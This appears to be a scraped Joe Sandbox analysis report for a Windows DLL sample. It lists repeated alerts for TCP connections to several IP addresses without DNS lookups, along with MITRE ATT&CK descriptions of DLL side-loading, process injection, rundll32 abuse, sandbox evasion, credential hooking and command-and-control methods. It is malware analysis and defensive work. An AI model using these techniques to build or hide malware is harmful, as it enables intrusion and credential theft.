Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exePID: 6324, Parent PID: 4056

Windows Analysis Report
file.dll